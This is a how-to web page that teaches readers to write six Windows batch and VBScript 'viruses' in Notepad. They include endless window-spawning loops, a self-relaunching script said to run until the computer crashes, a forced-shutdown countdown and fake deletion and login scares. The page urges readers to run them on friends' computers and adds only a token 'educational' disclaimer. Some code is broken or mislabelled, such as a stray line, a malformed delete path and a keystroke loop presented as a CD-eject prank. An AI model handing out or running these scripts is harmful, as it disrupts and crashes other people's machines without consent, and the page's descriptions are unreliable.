BREAKING NEWS
latest

ADS

ADS

how to make virus in notepad | how to make .bat virus in notepad

how to make virus in notepad | how to make .bat virus in notepad

how to make virus in notepad??

How to Create Virus is notepad in batch programming, We can create batch programming virus code with .bat extension and run in the windows operating system.



visit here for complete tutorial for how to make virus in notepad.

Virus 1 Description: How to create a bomb virus?

This virus will create and open a file that they cannot close in any way, minimize, or maximize without closing the command prompt behind it.
Step1:: Go into Notepad

Step2:: Type the text below.
@echo off
md hello
:A
start hello
goto A






CERTIFIED ETHICAL HACKER JOBS






Step3:: Save it as file.bat

Virus 2 Description: How to create a virus to delete all files?

This virus will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.this is very funny virus.

Step1:: Go into Notepad.

Step2:: Enter the text below into notepad
Y
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del “c:delete.bat”

Step3:: Save this as delete.bat (MUST NAME IT THIS!)
°°°°°°°°°°°°°°°°°°
•••••••••••••••••••••••••••••••

virus 3 Description : How to create file bomber virus ?

This virus will open and unlimited amount of command prompts until the computer crashes or you manually delete it.
Step1-> Go into Notepad

Step2->> Type start virus.bat
Step3->>> Save it as virus.bat (must be .bat)

••••••••••••••••••••••••••••

Virus 4 Description : How to create a shut Down virus in notepad ?
This makes your friend think that his/her computer has a virus then their computer shuts down.

Step(1):: Go to notepad and type:
@echo off
:A
cls
echo Do you wanna crash your computer?
(y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the

time reaches zero.
pause
msg * Your computer will crash in…
msg * 5
msg * 4
msg * 3
msg * 2
msg * 1
msg * Good-Bye
msg * You have been pwned! :)
shutdown -s -t 00

Step (2) :: Now save it as
Shutdown.bat

Now its done and you can try it in your friends computers

==================

Virus 5 Description: How to create a virus in notepad to enter login information?

Shows a fake username and password entrance area then deletes itself..
Step1-> Go into notepad and type:
@echo off
echo
Note:: {If the proper username and password is not entered all files will be deleted by this virus}

Step2 ->>
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and
password wrong
pause
echo Files are being deleted
pause
dir/s
del “c:up.bat”

Step3->>> Save it as up.bat (must be this!)

virus 6 Description : How to make a virus in notepad for cd drive eject
This vbs file will continually open your CD drive.

cd

CD Disk drive prank virus.

Step1-> Go into notepad

Step2->> Type the text below
Set wshShell = wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Step3->>> Save it as cdopen.vbs

Note:please do not test these virus in your own system,you can use virtual machine for the testing purpose.

I humbly request you to use this tricks on your own risk….
I’ll never  recommed you to harm anyone :) But i shared it for educational purpose…!! :)

Stay secured!!!!!!! :)
« PREV
NEXT »

Facebook Comments APPID